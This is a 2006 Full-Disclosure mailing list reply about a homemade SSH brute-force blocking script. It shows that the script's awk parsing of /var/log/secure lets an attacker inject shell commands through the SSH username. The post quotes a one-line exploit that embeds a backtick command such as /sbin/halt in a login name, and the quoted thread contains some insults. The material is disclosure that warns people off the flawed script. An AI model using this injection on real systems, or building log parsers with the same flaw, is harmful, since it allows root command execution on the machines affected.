Re: [Full-disclosure] SSH brute force blocking tool

On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
Since you seem to be clueless I'll answer step by step. Here goes idiot.
(Sinful to see someone so clueless coming from Gentoo... Guess it goes
with the romper room Linux territory)

Uh... actually, no. The provided exploit Will work, and you're the

Here, let me show you.

You do this:

awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru >>
diff /etc/hosts.deny /tmp/hosts.deny | awk '/\./ && />/{print $2}' >>

There is no hocus pocus here. Look at /var/log/secure and fine the term
"error retrieving" and print the next line, 13th column. Then sort it and
print the unique entries into /tmp/hosts.deny. After you do this, compare
/tmp/hosts.deny with /etc/hosts.deny and put the differences not in
into /etc/hosts.deny

What will be in column 13 when Tavis does this:

Tavis Ormandy wrote:
Here's an exploit.

ssh 'foo bar `/sbin/halt`'@victim

Why, the shelled-out output of `/sbin/halt`!

Or, hey, anything he or I care to put inside backticks. You'll
execute it blindly, as root, on your system.

Kids, don't use this script. Please.

gabriel rosenkoetter

Attachment: pgpsLV7qHdSA1.pgp
Description: PGP signature

Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia -